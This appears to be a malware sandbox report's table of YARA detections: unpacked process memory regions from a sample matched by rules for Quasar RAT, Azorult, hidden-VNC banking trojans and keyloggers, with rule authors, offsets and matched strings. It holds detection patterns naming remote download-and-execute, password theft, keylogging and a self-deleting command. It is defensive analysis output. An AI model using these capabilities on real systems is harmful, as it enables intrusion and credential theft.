10.3.SystemPropertiesPerformance.exe.5ce01cc.5.raw.unpack	Quasar_RAT_1	Detects Quasar RAT	Florian Roth	0xab49e:$s1: DoUploadAndExecute 0xb0db5:$s2: DoDownloadAndExecute 0xab274:$s3: DoShellExecute 0xab696:$s4: set_Processname 0x79a30:$op1: 04 1E FE 02 04 16 FE 01 60 0x79954:$op2: 00 17 03 1F 20 17 19 15 28 0x7a3c1:$op3: 00 04 03 69 91 1B 40 0x7ac20:$op3: 00 04 03 69 91 1B 40
10.3.SystemPropertiesPerformance.exe.5ce01cc.5.raw.unpack	Quasar_RAT_2	Detects Quasar RAT	Florian Roth	0xaacf4:$x1: GetKeyloggerLogsResponse 0xaaf34:$s1: DoShellExecuteResponse 0xa4322:$s2: GetPasswordsResponse 0xaae07:$s3: GetStartupItemsResponse 0xa15f0:$s4: <GetGenReader>b__7 0xab4b2:$s5: RunHidden 0xab4d0:$s5: RunHidden 0xab4de:$s5: RunHidden 0xab4f2:$s5: RunHidden
10.3.SystemPropertiesPerformance.exe.5ce01cc.5.raw.unpack	MAL_QuasarRAT_May19_1	Detects QuasarRAT malware	Florian Roth	0xb3dcc:$xc2: 00 70 00 69 00 6E 00 67 00 20 00 2D 00 6E 00 20 00 31 00 30 00 20 00 6C 00 6F 00 63 00 61 00 6C 00 68 00 6F 00 73 00 74 00 20 00 3E 00 20 00 6E 00 75 00 6C 00 0D 00 0A 00 64 00 65 00 6C 00 20 ...
10.3.SystemPropertiesPerformance.exe.5ce01cc.5.raw.unpack	CN_disclosed_20180208_KeyLogger_1	Detects malware from disclosed CN malware set	Florian Roth	0xb3b90:$x2: Process already elevated. 0xac6ef:$x4: get_encryptedPassword 0xb0db5:$x5: DoDownloadAndExecute
10.3.SystemPropertiesPerformance.exe.5ce01cc.5.raw.unpack	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
10.3.SystemPropertiesPerformance.exe.5ce01cc.5.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
10.3.SystemPropertiesPerformance.exe.5ce01cc.5.raw.unpack	JoeSecurity_ramnitvncmodule	Yara detected Ramnit VNC Module	Joe Security
4.2.vnc.exe.ae1000.2.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
4.2.vnc.exe.ae1000.2.unpack	JoeSecurity_ramnitvncmodule	Yara detected Ramnit VNC Module	Joe Security
10.3.SystemPropertiesPerformance.exe.5ce45cc.6.raw.unpack	crime_win32_hvnc_banker_gen	Detects malware banker hidden VNC	@VK_Intel
10.3.SystemPropertiesPerformance.exe.5ce45cc.6.raw.unpack	xRAT_1	Detects Patchwork malware	Florian Roth	0x91c28:$x4: xClient.Properties.Resources.resources 0x91ae9:$s4: Client.exe 0xa70da:$s7: set_RunHidden
10.3.SystemPropertiesPerformance.exe.5ce45cc.6.raw.unpack	Quasar_RAT_1	Detects Quasar RAT	Florian Roth	0xa709e:$s1: DoUploadAndExecute 0xac9b5:$s2: DoDownloadAndExecute 0xa6e74:$s3: DoShellExecute 0xa7296:$s4: set_Processname 0x75630:$op1: 04 1E FE 02 04 16 FE 01 60 0x75554:$op2: 00 17 03 1F 20 17 19 15 28 0x75fc1:$op3: 00 04 03 69 91 1B 40 0x76820:$op3: 00 04 03 69 91 1B 40
10.3.SystemPropertiesPerformance.exe.5ce45cc.6.raw.unpack	Quasar_RAT_2	Detects Quasar RAT	Florian Roth	0xa68f4:$x1: GetKeyloggerLogsResponse 0xa6b34:$s1: DoShellExecuteResponse 0x9ff22:$s2: GetPasswordsResponse 0xa6a07:$s3: GetStartupItemsResponse 0x9d1f0:$s4: <GetGenReader>b__7 0xa70b2:$s5: RunHidden 0xa70d0:$s5: RunHidden 0xa70de:$s5: RunHidden 0xa70f2:$s5: RunHidden
10.3.SystemPropertiesPerformance.exe.5ce45cc.6.raw.unpack	MAL_QuasarRAT_May19_1	Detects QuasarRAT malware	Florian Roth	0xaf9cc:$xc2: 00 70 00 69 00 6E 00 67 00 20 00 2D 00 6E 00 20 00 31 00 30 00 20 00 6C 00 6F 00 63 00 61 00 6C 00 68 00 6F 00 73 00 74 00 20 00 3E 00 20 00 6E 00 75 00 6C 00 0D 00 0A 00 64 00 65 00 6C 00 20 ...
10.3.SystemPropertiesPerformance.exe.5ce45cc.6.raw.unpack	CN_disclosed_20180208_KeyLogger_1	Detects malware from disclosed CN malware set	Florian Roth	0xaf790:$x2: Process already elevated. 0xa82ef:$x4: get_encryptedPassword 0xac9b5:$x5: DoDownloadAndExecute
10.3.SystemPropertiesPerformance.exe.5ce45cc.6.raw.unpack	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
10.3.SystemPropertiesPerformance.exe.5ce45cc.6.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
10.3.SystemPropertiesPerformance.exe.5ce45cc.6.raw.unpack	JoeSecurity_ramnitvncmodule	Yara detected Ramnit VNC Module	Joe Security
10.3.SystemPropertiesPerformance.exe.5ce45cc.6.raw.unpack	crime_win32_hvnc_zloader1_hvnc_generic	Detects Zloader hidden VNC	@VK_Intel
10.3.SystemPropertiesPerformance.exe.18f9408.1.raw.unpack	crime_win32_hvnc_banker_gen	Detects malware banker hidden VNC	@VK_Intel
10.3.SystemPropertiesPerformance.exe.18f9408.1.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
10.3.SystemPropertiesPerformance.exe.18f9408.1.raw.unpack	JoeSecurity_ramnitvncmodule	Yara detected Ramnit VNC Module	Joe Security
10.3.SystemPropertiesPerformance.exe.18f9408.1.raw.unpack	crime_win32_hvnc_zloader1_hvnc_generic	Detects Zloader hidden VNC	@VK_Intel
1.3.CVbJSUXraQ.exe.1833408.5.raw.unpack	crime_win32_hvnc_banker_gen	Detects malware banker hidden VNC	@VK_Intel
1.3.CVbJSUXraQ.exe.1833408.5.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
1.3.CVbJSUXraQ.exe.1833408.5.raw.unpack	JoeSecurity_ramnitvncmodule	Yara detected Ramnit VNC Module	Joe Security
1.3.CVbJSUXraQ.exe.1833408.5.raw.unpack	crime_win32_hvnc_zloader1_hvnc_generic	Detects Zloader hidden VNC	@VK_Intel
1.0.CVbJSUXraQ.exe.f14fac.1.raw.unpack	Vermin_Keylogger_Jan18_1	Detects Vermin Keylogger	Florian Roth	0x7b8f4:$x3: GetKeyloggerLogsResponse 0x7bdea:$x4: GetKeyloggerLogs 0x7c0b1:$s1: <RunHidden>k__BackingField 0x7babc:$s2: set_SystemInfos 0x7c0da:$s3: set_RunHidden 0x7bce8:$s4: set_RemotePath 0x8cdf8:$s6: Client.exe 0x8ce60:$s6: Client.exe 0x8115b:$s7: xClient.Core.ReverseProxy.Packets
1.0.CVbJSUXraQ.exe.f14fac.1.raw.unpack	crime_win32_hvnc_banker_gen	Detects malware banker hidden VNC	@VK_Intel
1.0.CVbJSUXraQ.exe.f14fac.1.raw.unpack	xRAT_1	Detects Patchwork malware	Florian Roth	0x66c28:$x4: xClient.Properties.Resources.resources 0x66ae9:$s4: Client.exe 0x7c0da:$s7: set_RunHidden
1.0.CVbJSUXraQ.exe.f14fac.1.raw.unpack	Quasar_RAT_1	Detects Quasar RAT	Florian Roth	0x7c09e:$s1: DoUploadAndExecute 0x819b5:$s2: DoDownloadAndExecute 0x7be74:$s3: DoShellExecute 0x7c296:$s4: set_Processname 0x4a630:$op1: 04 1E FE 02 04 16 FE 01 60 0x4a554:$op2: 00 17 03 1F 20 17 19 15 28 0x4afc1:$op3: 00 04 03 69 91 1B 40 0x4b820:$op3: 00 04 03 69 91 1B 40
1.0.CVbJSUXraQ.exe.f14fac.1.raw.unpack	Quasar_RAT_2	Detects Quasar RAT	Florian Roth	0x7b8f4:$x1: GetKeyloggerLogsResponse 0x7bb34:$s1: DoShellExecuteResponse 0x74f22:$s2: GetPasswordsResponse 0x7ba07:$s3: GetStartupItemsResponse 0x721f0:$s4: <GetGenReader>b__7 0x7c0b2:$s5: RunHidden 0x7c0d0:$s5: RunHidden 0x7c0de:$s5: RunHidden 0x7c0f2:$s5: RunHidden
1.0.CVbJSUXraQ.exe.f14fac.1.raw.unpack	MAL_QuasarRAT_May19_1	Detects QuasarRAT malware	Florian Roth	0x849cc:$xc2: 00 70 00 69 00 6E 00 67 00 20 00 2D 00 6E 00 20 00 31 00 30 00 20 00 6C 00 6F 00 63 00 61 00 6C 00 68 00 6F 00 73 00 74 00 20 00 3E 00 20 00 6E 00 75 00 6C 00 0D 00 0A 00 64 00 65 00 6C 00 20 ...
1.0.CVbJSUXraQ.exe.f14fac.1.raw.unpack	CN_disclosed_20180208_KeyLogger_1	Detects malware from disclosed CN malware set	Florian Roth	0x84790:$x2: Process already elevated. 0x7d2ef:$x4: get_encryptedPassword 0x819b5:$x5: DoDownloadAndExecute
1.0.CVbJSUXraQ.exe.f14fac.1.raw.unpack	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
1.0.CVbJSUXraQ.exe.f14fac.1.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
1.0.CVbJSUXraQ.exe.f14fac.1.raw.unpack	JoeSecurity_ramnitvncmodule	Yara detected Ramnit VNC Module	Joe Security
1.0.CVbJSUXraQ.exe.f14fac.1.raw.unpack	crime_win32_hvnc_zloader1_hvnc_generic	Detects Zloader hidden VNC	@VK_Intel
10.2.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack	Vermin_Keylogger_Jan18_1	Detects Vermin Keylogger	Florian Roth	0x7b8f4:$x3: GetKeyloggerLogsResponse 0x7bdea:$x4: GetKeyloggerLogs 0x7c0b1:$s1: <RunHidden>k__BackingField 0x7babc:$s2: set_SystemInfos 0x7c0da:$s3: set_RunHidden 0x7bce8:$s4: set_RemotePath 0x8cdf8:$s6: Client.exe 0x8ce60:$s6: Client.exe 0x8115b:$s7: xClient.Core.ReverseProxy.Packets
10.2.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack	crime_win32_hvnc_banker_gen	Detects malware banker hidden VNC	@VK_Intel
10.2.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack	xRAT_1	Detects Patchwork malware	Florian Roth	0x66c28:$x4: xClient.Properties.Resources.resources 0x66ae9:$s4: Client.exe 0x7c0da:$s7: set_RunHidden
10.2.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack	Quasar_RAT_1	Detects Quasar RAT	Florian Roth	0x7c09e:$s1: DoUploadAndExecute 0x819b5:$s2: DoDownloadAndExecute 0x7be74:$s3: DoShellExecute 0x7c296:$s4: set_Processname 0x4a630:$op1: 04 1E FE 02 04 16 FE 01 60 0x4a554:$op2: 00 17 03 1F 20 17 19 15 28 0x4afc1:$op3: 00 04 03 69 91 1B 40 0x4b820:$op3: 00 04 03 69 91 1B 40
10.2.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack	Quasar_RAT_2	Detects Quasar RAT	Florian Roth	0x7b8f4:$x1: GetKeyloggerLogsResponse 0x7bb34:$s1: DoShellExecuteResponse 0x74f22:$s2: GetPasswordsResponse 0x7ba07:$s3: GetStartupItemsResponse 0x721f0:$s4: <GetGenReader>b__7 0x7c0b2:$s5: RunHidden 0x7c0d0:$s5: RunHidden 0x7c0de:$s5: RunHidden 0x7c0f2:$s5: RunHidden
10.2.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack	MAL_QuasarRAT_May19_1	Detects QuasarRAT malware	Florian Roth	0x849cc:$xc2: 00 70 00 69 00 6E 00 67 00 20 00 2D 00 6E 00 20 00 31 00 30 00 20 00 6C 00 6F 00 63 00 61 00 6C 00 68 00 6F 00 73 00 74 00 20 00 3E 00 20 00 6E 00 75 00 6C 00 0D 00 0A 00 64 00 65 00 6C 00 20 ...
10.2.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack	CN_disclosed_20180208_KeyLogger_1	Detects malware from disclosed CN malware set	Florian Roth	0x84790:$x2: Process already elevated. 0x7d2ef:$x4: get_encryptedPassword 0x819b5:$x5: DoDownloadAndExecute
10.2.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
10.2.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
10.2.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack	JoeSecurity_ramnitvncmodule	Yara detected Ramnit VNC Module	Joe Security
10.2.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack	crime_win32_hvnc_zloader1_hvnc_generic	Detects Zloader hidden VNC	@VK_Intel
5.0.svchost.exe.cc5c50.7.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
5.0.svchost.exe.cc5c50.7.unpack	JoeSecurity_ramnitvncmodule	Yara detected Ramnit VNC Module	Joe Security
7.0.CVbJSUXraQ.exe.f14fac.3.raw.unpack	Vermin_Keylogger_Jan18_1	Detects Vermin Keylogger	Florian Roth	0x7b8f4:$x3: GetKeyloggerLogsResponse 0x7bdea:$x4: GetKeyloggerLogs 0x7c0b1:$s1: <RunHidden>k__BackingField 0x7babc:$s2: set_SystemInfos 0x7c0da:$s3: set_RunHidden 0x7bce8:$s4: set_RemotePath 0x8cdf8:$s6: Client.exe 0x8ce60:$s6: Client.exe 0x8115b:$s7: xClient.Core.ReverseProxy.Packets
7.0.CVbJSUXraQ.exe.f14fac.3.raw.unpack	crime_win32_hvnc_banker_gen	Detects malware banker hidden VNC	@VK_Intel
7.0.CVbJSUXraQ.exe.f14fac.3.raw.unpack	xRAT_1	Detects Patchwork malware	Florian Roth	0x66c28:$x4: xClient.Properties.Resources.resources 0x66ae9:$s4: Client.exe 0x7c0da:$s7: set_RunHidden
7.0.CVbJSUXraQ.exe.f14fac.3.raw.unpack	Quasar_RAT_1	Detects Quasar RAT	Florian Roth	0x7c09e:$s1: DoUploadAndExecute 0x819b5:$s2: DoDownloadAndExecute 0x7be74:$s3: DoShellExecute 0x7c296:$s4: set_Processname 0x4a630:$op1: 04 1E FE 02 04 16 FE 01 60 0x4a554:$op2: 00 17 03 1F 20 17 19 15 28 0x4afc1:$op3: 00 04 03 69 91 1B 40 0x4b820:$op3: 00 04 03 69 91 1B 40
7.0.CVbJSUXraQ.exe.f14fac.3.raw.unpack	Quasar_RAT_2	Detects Quasar RAT	Florian Roth	0x7b8f4:$x1: GetKeyloggerLogsResponse 0x7bb34:$s1: DoShellExecuteResponse 0x74f22:$s2: GetPasswordsResponse 0x7ba07:$s3: GetStartupItemsResponse 0x721f0:$s4: <GetGenReader>b__7 0x7c0b2:$s5: RunHidden 0x7c0d0:$s5: RunHidden 0x7c0de:$s5: RunHidden 0x7c0f2:$s5: RunHidden
7.0.CVbJSUXraQ.exe.f14fac.3.raw.unpack	MAL_QuasarRAT_May19_1	Detects QuasarRAT malware	Florian Roth	0x849cc:$xc2: 00 70 00 69 00 6E 00 67 00 20 00 2D 00 6E 00 20 00 31 00 30 00 20 00 6C 00 6F 00 63 00 61 00 6C 00 68 00 6F 00 73 00 74 00 20 00 3E 00 20 00 6E 00 75 00 6C 00 0D 00 0A 00 64 00 65 00 6C 00 20 ...
7.0.CVbJSUXraQ.exe.f14fac.3.raw.unpack	CN_disclosed_20180208_KeyLogger_1	Detects malware from disclosed CN malware set	Florian Roth	0x84790:$x2: Process already elevated. 0x7d2ef:$x4: get_encryptedPassword 0x819b5:$x5: DoDownloadAndExecute
7.0.CVbJSUXraQ.exe.f14fac.3.raw.unpack	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
7.0.CVbJSUXraQ.exe.f14fac.3.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
7.0.CVbJSUXraQ.exe.f14fac.3.raw.unpack	JoeSecurity_ramnitvncmodule	Yara detected Ramnit VNC Module	Joe Security
7.0.CVbJSUXraQ.exe.f14fac.3.raw.unpack	crime_win32_hvnc_zloader1_hvnc_generic	Detects Zloader hidden VNC	@VK_Intel
1.0.CVbJSUXraQ.exe.f14fac.1.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
1.0.CVbJSUXraQ.exe.f14fac.1.unpack	JoeSecurity_ramnitvncmodule	Yara detected Ramnit VNC Module	Joe Security
1.3.CVbJSUXraQ.exe.175f8e0.1.raw.unpack	crime_win32_hvnc_banker_gen	Detects malware banker hidden VNC	@VK_Intel
1.3.CVbJSUXraQ.exe.175f8e0.1.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
1.3.CVbJSUXraQ.exe.175f8e0.1.raw.unpack	JoeSecurity_ramnitvncmodule	Yara detected Ramnit VNC Module	Joe Security
1.3.CVbJSUXraQ.exe.175f8e0.1.raw.unpack	crime_win32_hvnc_zloader1_hvnc_generic	Detects Zloader hidden VNC	@VK_Intel
10.0.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack	crime_win32_hvnc_banker_gen	Detects malware banker hidden VNC	@VK_Intel
10.0.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack	xRAT_1	Detects Patchwork malware	Florian Roth	0x91c28:$x4: xClient.Properties.Resources.resources 0x91ae9:$s4: Client.exe 0xa70da:$s7: set_RunHidden
10.0.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack	Quasar_RAT_1	Detects Quasar RAT	Florian Roth	0xa709e:$s1: DoUploadAndExecute 0xac9b5:$s2: DoDownloadAndExecute 0xa6e74:$s3: DoShellExecute 0xa7296:$s4: set_Processname 0x75630:$op1: 04 1E FE 02 04 16 FE 01 60 0x75554:$op2: 00 17 03 1F 20 17 19 15 28 0x75fc1:$op3: 00 04 03 69 91 1B 40 0x76820:$op3: 00 04 03 69 91 1B 40
10.0.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack	Quasar_RAT_2	Detects Quasar RAT	Florian Roth	0xa68f4:$x1: GetKeyloggerLogsResponse 0xa6b34:$s1: DoShellExecuteResponse 0x9ff22:$s2: GetPasswordsResponse 0xa6a07:$s3: GetStartupItemsResponse 0x9d1f0:$s4: <GetGenReader>b__7 0xa70b2:$s5: RunHidden 0xa70d0:$s5: RunHidden 0xa70de:$s5: RunHidden 0xa70f2:$s5: RunHidden
10.0.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack	MAL_QuasarRAT_May19_1	Detects QuasarRAT malware	Florian Roth	0xaf9cc:$xc2: 00 70 00 69 00 6E 00 67 00 20 00 2D 00 6E 00 20 00 31 00 30 00 20 00 6C 00 6F 00 63 00 61 00 6C 00 68 00 6F 00 73 00 74 00 20 00 3E 00 20 00 6E 00 75 00 6C 00 0D 00 0A 00 64 00 65 00 6C 00 20 ...
10.0.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack	CN_disclosed_20180208_KeyLogger_1	Detects malware from disclosed CN malware set	Florian Roth	0xaf790:$x2: Process already elevated. 0xa82ef:$x4: get_encryptedPassword 0xac9b5:$x5: DoDownloadAndExecute
10.0.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
10.0.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
10.0.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack	JoeSecurity_ramnitvncmodule	Yara detected Ramnit VNC Module	Joe Security
10.0.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack	crime_win32_hvnc_zloader1_hvnc_generic	Detects Zloader hidden VNC	@VK_Intel
4.0.vnc.exe.ab6000.1.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
4.0.vnc.exe.ab6000.1.unpack	JoeSecurity_ramnitvncmodule	Yara detected Ramnit VNC Module	Joe Security
4.2.vnc.exe.ab0000.0.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
4.2.vnc.exe.ab0000.0.unpack	JoeSecurity_ramnitvncmodule	Yara detected Ramnit VNC Module	Joe Security
5.2.svchost.exe.c9ac50.1.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
5.2.svchost.exe.c9ac50.1.unpack	JoeSecurity_ramnitvncmodule	Yara detected Ramnit VNC Module	Joe Security
1.3.CVbJSUXraQ.exe.178a8e0.3.unpack	Vermin_Keylogger_Jan18_1	Detects Vermin Keylogger	Florian Roth	0x24d7c:$x3: GetKeyloggerLogsResponse 0x25272:$x4: GetKeyloggerLogs 0x25539:$s1: <RunHidden>k__BackingField 0x24f44:$s2: set_SystemInfos 0x25562:$s3: set_RunHidden 0x25170:$s4: set_RemotePath
1.3.CVbJSUXraQ.exe.178a8e0.3.unpack	xRAT_1	Detects Patchwork malware	Florian Roth	0x100b0:$x4: xClient.Properties.Resources.resources 0xff71:$s4: Client.exe 0x25562:$s7: set_RunHidden
1.3.CVbJSUXraQ.exe.178a8e0.3.unpack	Quasar_RAT_2	Detects Quasar RAT	Florian Roth	0x24d7c:$x1: GetKeyloggerLogsResponse 0x24fbc:$s1: DoShellExecuteResponse 0x1e3aa:$s2: GetPasswordsResponse 0x24e8f:$s3: GetStartupItemsResponse 0x1b678:$s4: <GetGenReader>b__7 0x2553a:$s5: RunHidden 0x25558:$s5: RunHidden 0x25566:$s5: RunHidden 0x2557a:$s5: RunHidden
1.3.CVbJSUXraQ.exe.178a8e0.3.unpack	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
1.3.CVbJSUXraQ.exe.178a8e0.3.unpack	JoeSecurity_Azorult_1	Yara detected Azorult	Joe Security
1.3.CVbJSUXraQ.exe.178a8e0.0.raw.unpack	crime_win32_hvnc_banker_gen	Detects malware banker hidden VNC	@VK_Intel
1.3.CVbJSUXraQ.exe.178a8e0.0.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
1.3.CVbJSUXraQ.exe.178a8e0.0.raw.unpack	JoeSecurity_ramnitvncmodule	Yara detected Ramnit VNC Module	Joe Security
1.3.CVbJSUXraQ.exe.178a8e0.0.raw.unpack	crime_win32_hvnc_zloader1_hvnc_generic	Detects Zloader hidden VNC	@VK_Intel
5.0.svchost.exe.c9ac50.2.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
5.0.svchost.exe.c9ac50.2.unpack	JoeSecurity_ramnitvncmodule	Yara detected Ramnit VNC Module	Joe Security
1.3.CVbJSUXraQ.exe.3800000.6.unpack	JoeSecurity_Azorult	Yara detected Azorult Info Stealer	Joe Security
1.3.CVbJSUXraQ.exe.3800000.6.unpack	JoeSecurity_Azorult_1	Yara detected Azorult	Joe Security
1.3.CVbJSUXraQ.exe.3800000.6.unpack	Azorult_1	Azorult Payload	kevoreilly	0x17353:$code1: C7 07 3C 00 00 00 8D 45 80 89 47 04 C7 47 08 20 00 00 00 8D 85 80 FE FF FF 89 47 10 C7 47 14 00 01 00 00 8D 85 00 FE FF FF 89 47 1C C7 47 20 80 00 00 00 8D 85 80 FD FF FF 89 47 24 C7 47 28 80 ... 0x1207c:$string1: SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),"unixepoch")
1.3.CVbJSUXraQ.exe.1833408.5.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
1.3.CVbJSUXraQ.exe.1833408.5.unpack	JoeSecurity_ramnitvncmodule	Yara detected Ramnit VNC Module	Joe Security
1.3.CVbJSUXraQ.exe.175f8e0.2.raw.unpack	crime_win32_hvnc_banker_gen	Detects malware banker hidden VNC	@VK_Intel
1.3.CVbJSUXraQ.exe.175f8e0.2.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
1.3.CVbJSUXraQ.exe.175f8e0.2.raw.unpack	JoeSecurity_ramnitvncmodule	Yara detected Ramnit VNC Module	Joe Security
1.3.CVbJSUXraQ.exe.175f8e0.2.raw.unpack	crime_win32_hvnc_zloader1_hvnc_generic	Detects Zloader hidden VNC	@VK_Intel
1.3.CVbJSUXraQ.exe.1808408.4.raw.unpack	crime_win32_hvnc_banker_gen	Detects malware banker hidden VNC	@VK_Intel
1.3.CVbJSUXraQ.exe.1808408.4.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
1.3.CVbJSUXraQ.exe.1808408.4.raw.unpack	JoeSecurity_ramnitvncmodule	Yara detected Ramnit VNC Module	Joe Security
1.3.CVbJSUXraQ.exe.1808408.4.raw.unpack	crime_win32_hvnc_zloader1_hvnc_generic	Detects Zloader hidden VNC	@VK_Intel
5.0.svchost.exe.c9ac50.8.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
5.0.svchost.exe.c9ac50.8.unpack	JoeSecurity_ramnitvncmodule	Yara detected Ramnit VNC Module	Joe Security
7.0.CVbJSUXraQ.exe.ee5bac.1.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
7.0.CVbJSUXraQ.exe.ee5bac.1.unpack	JoeSecurity_ramnitvncmodule	Yara detected Ramnit VNC Module	Joe Security
5.0.svchost.exe.c9ac50.5.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
5.0.svchost.exe.c9ac50.5.unpack	JoeSecurity_ramnitvncmodule	Yara detected Ramnit VNC Module	Joe Security
1.2.CVbJSUXraQ.exe.f14fac.1.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
1.2.CVbJSUXraQ.exe.f14fac.1.unpack	JoeSecurity_ramnitvncmodule	Yara detected Ramnit VNC Module	Joe Security
1.3.CVbJSUXraQ.exe.178a8e0.0.unpack	Vermin_Keylogger_Jan18_1	Detects Vermin Keylogger	Florian Roth	0x24d7c:$x3: GetKeyloggerLogsResponse 0x25272:$x4: GetKeyloggerLogs 0x25539:$s1: <RunHidden>k__BackingField 0x24f44:$s2: set_SystemInfos 0x25562:$s3: set_RunHidden 0x25170:$s4: set_RemotePath
1.3.CVbJSUXraQ.exe.178a8e0.0.unpack	xRAT_1	Detects Patchwork malware	Florian Roth	0x100b0:$x4: xClient.Properties.Resources.resources 0xff71:$s4: Client.exe 0x25562:$s7: set_RunHidden
1.3.CVbJSUXraQ.exe.178a8e0.0.unpack	Quasar_RAT_2	Detects Quasar RAT	Florian Roth	0x24d7c:$x1: GetKeyloggerLogsResponse 0x24fbc:$s1: DoShellExecuteResponse 0x1e3aa:$s2: GetPasswordsResponse 0x24e8f:$s3: GetStartupItemsResponse 0x1b678:$s4: <GetGenReader>b__7 0x2553a:$s5: RunHidden 0x25558:$s5: RunHidden 0x25566:$s5: RunHidden 0x2557a:$s5: RunHidden
1.3.CVbJSUXraQ.exe.178a8e0.0.unpack	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
1.3.CVbJSUXraQ.exe.178a8e0.0.unpack	JoeSecurity_Azorult_1	Yara detected Azorult	Joe Security
5.2.svchost.exe.cc5c50.2.raw.unpack	crime_win32_hvnc_banker_gen	Detects malware banker hidden VNC	@VK_Intel
5.2.svchost.exe.cc5c50.2.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
5.2.svchost.exe.cc5c50.2.raw.unpack	JoeSecurity_ramnitvncmodule	Yara detected Ramnit VNC Module	Joe Security
5.2.svchost.exe.cc5c50.2.raw.unpack	crime_win32_hvnc_zloader1_hvnc_generic	Detects Zloader hidden VNC	@VK_Intel
10.0.SystemPropertiesPerformance.exe.ba4fac.3.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
10.0.SystemPropertiesPerformance.exe.ba4fac.3.unpack	JoeSecurity_ramnitvncmodule	Yara detected Ramnit VNC Module	Joe Security
1.0.CVbJSUXraQ.exe.ee9fac.2.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
1.0.CVbJSUXraQ.exe.ee9fac.2.unpack	JoeSecurity_ramnitvncmodule	Yara detected Ramnit VNC Module	Joe Security
4.0.vnc.exe.ae1000.2.raw.unpack	crime_win32_hvnc_banker_gen	Detects malware banker hidden VNC	@VK_Intel
4.0.vnc.exe.ae1000.2.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
4.0.vnc.exe.ae1000.2.raw.unpack	JoeSecurity_ramnitvncmodule	Yara detected Ramnit VNC Module	Joe Security
4.0.vnc.exe.ae1000.2.raw.unpack	crime_win32_hvnc_zloader1_hvnc_generic	Detects Zloader hidden VNC	@VK_Intel
5.0.svchost.exe.c9ac50.5.raw.unpack	crime_win32_hvnc_banker_gen	Detects malware banker hidden VNC	@VK_Intel
5.0.svchost.exe.c9ac50.5.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
5.0.svchost.exe.c9ac50.5.raw.unpack	JoeSecurity_ramnitvncmodule	Yara detected Ramnit VNC Module	Joe Security
5.0.svchost.exe.c9ac50.5.raw.unpack	crime_win32_hvnc_zloader1_hvnc_generic	Detects Zloader hidden VNC	@VK_Intel
1.2.CVbJSUXraQ.exe.f14fac.1.raw.unpack	Vermin_Keylogger_Jan18_1	Detects Vermin Keylogger	Florian Roth	0x7b8f4:$x3: GetKeyloggerLogsResponse 0x7bdea:$x4: GetKeyloggerLogs 0x7c0b1:$s1: <RunHidden>k__BackingField 0x7babc:$s2: set_SystemInfos 0x7c0da:$s3: set_RunHidden 0x7bce8:$s4: set_RemotePath 0x8cdf8:$s6: Client.exe 0x8ce60:$s6: Client.exe 0x8115b:$s7: xClient.Core.ReverseProxy.Packets
